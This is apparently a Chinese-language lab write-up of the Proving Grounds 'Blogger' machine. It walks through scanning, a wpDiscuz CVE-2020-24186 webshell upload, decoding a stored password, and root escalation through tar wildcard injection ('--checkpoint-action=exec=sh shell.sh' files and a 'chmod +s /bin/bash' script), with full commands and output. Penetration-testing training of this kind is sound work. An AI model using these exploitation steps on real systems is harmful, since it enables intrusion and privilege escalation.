主要知识点
- 路径爆破寻找有价值的线索
- php reverse shell伪装图片创建反弹连接
- base64嵌套解密获取密码
- tar 备份提权
具体步骤
首先nmap起手,虽然ssh版本比较老,但是它不能提供更多有价值的线索了,注意力放在80端口
Nmap scan report for 192.168.177.217
Host is up (0.42s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
| 256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_ 256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
80端口看起来也没有什么东西,但是路径爆破发现了一些路径,需要挨个看一下
# Dirsearch started Wed Feb 5 08:26:27 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.132.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt301 319B http://192.168.132.217/images -> REDIRECTS TO: http://192.168.132.217/images/
301 319B http://192.168.132.217/assets -> REDIRECTS TO: http://192.168.132.217/assets/
301 316B http://192.168.132.217/css -> REDIRECTS TO: http://192.168.132.217/css/
301 315B http://192.168.132.217/js -> REDIRECTS TO: http://192.168.132.217/js/
403 280B http://192.168.132.217/server-status
居然在assets/fonts路径下发现了一个blog目录,不过需要先把blogger.pg添加到/etc/hosts文件中才能正常访问,不过可以看出是一个wordpress实例
用wpscan扫描一下发现wpdiscuz插件有文件上传漏洞
搜搜一下exp,发现了https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE,可以实现reverse shell
C:\home\kali\Documents\OFFSEC\play\Blogger\CVE-2020-24186-wpDiscuz-7.0.4-RCE-main> sudo python wpDiscuz_RemoteCodeExec.py -u http://blogger.pg/assets/fonts/blog -p ?p=29
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- [+] Response length:[59354] | code:[200]
[!] Got wmuSecurity value: e8f3a1bf79
[!] Got wmuSecurity value: 29 [+] Generating random name for Webshell...
[!] Generated webshell name: wlitvttntqthjma[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/02/wlitvttntqthjma-1738722269.2139.php > iduid=33(www-data) gid=33(www-data) groups=33(www-data)
▒
其实也可以手动修改php-reverse-shell.php,在post下面作为图片上传来实现reverse shell,要注意添加 GIF689a;字样
当reverse shell创建成功后,上传linpeas.sh与pspy64并运行
在pspy64的结果中发现了 /usr/local/bin/backup.sh被root用户以cronjob的形式运行,并且它会利用tar命令备份/home/james/路径下的 local.txt,不过目前我们没有james的密码
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855██▓███ ██████ ██▓███ ▓██ ██▓▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
......
......
2025/02/05 01:10:01 CMD: UID=0 PID=20223 | /bin/sh /usr/local/bin/backup.sh
2025/02/05 01:10:01 CMD: UID=0 PID=20222 | /bin/sh -c /usr/local/bin/backup.sh
2025/02/05 01:10:01 CMD: UID=0 PID=20224 | tar czf /tmp/backup.tar.gz local.txt
不过在linpeas.sh的结果中发现了 .creds文件,内容为: ';u22>'v$)='2a#B&>`c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+(|`yx')Av#>'v%?}:#=+)';y@%'5(2vA!'<y$&u"H!"ll
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 104 Jan 17 2021 /opt/.creds
看起来像是加密或者编码过的,在CyberChef中可以利用rot47+base64来解码,得到了james用户的密码
利用得到的密码来转变成james来在/home/james路径下创建文件来实现提权,思路是利用创建checkpoint文件 来让tar命令执行的时候调用相关script
www-data@ubuntu-xenial:/opt$ su james
su james
Password: S3cr37_P@$$W0rdjames@ubuntu-xenial:/opt$ cd /home/james
james@ubuntu-xenial:~$ id
id
uid=1002(james) gid=1002(james) groups=1002(james)james@ubuntu-xenial:~$ echo "chmod +s /bin/bash" >shell.sh\echo "chmod +s /bin/bash" >shell.sh\
> james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root root 4096 Jan 17 2021 ..
-rw-r--r-- 1 james james 655 Jan 17 2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17 2021 .bashrc
-rw-r--r-- 1 james james 220 Jan 17 2021 .bash_logout
-rw-r--r-- 1 root root 33 Feb 5 00:08 local.txt
-rw-rw-r-- 1 james james 19 Feb 5 02:02 shell.sh
drwxr-xr-x 2 james james 4096 Feb 5 02:02 .
james@ubuntu-xenial:~$ cat shell.sh
cat shell.sh
chmod +s /bin/bash
james@ubuntu-xenial:~$ chmod +x shell.shchmod +x shell.sh
james@ubuntu-xenial:~$ touch -- "--checkpoint-action=exec=sh shell.sh"touch -- "--checkpoint-action=exec=sh shell.sh"
james@ubuntu-xenial:~$ touch -- "--checkpoint=1"
touch -- "--checkpoint=1"
james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root root 4096 Jan 17 2021 ..
-rw-r--r-- 1 james james 655 Jan 17 2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17 2021 .bashrc
-rw-r--r-- 1 james james 220 Jan 17 2021 .bash_logout
-rw-r--r-- 1 root root 33 Feb 5 00:08 local.txt
-rwxrwxr-x 1 james james 19 Feb 5 02:02 shell.sh
-rw-rw-r-- 1 james james 0 Feb 5 02:03 --checkpoint-action=exec=sh shell.sh
-rw-rw-r-- 1 james james 0 Feb 5 02:03 --checkpoint=1
drwxr-xr-x 2 james james 4096 Feb 5 02:03 .
稍等一会儿提权成功
james@ubuntu-xenial:~$ ls -l /bin/bash
ls -l /bin/bash
-rwxr-xr-x 1 root root 1037528 Jul 12 2019 /bin/bash
james@ubuntu-xenial:~$ ^[[A
ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12 2019 /bin/bash
james@ubuntu-xenial:~$ /bin/bash -p
/bin/bash -p
bash-4.3# cat /root/proof.txt
cat /root/proof.txt
13618d6242920b9f53a9623217760e49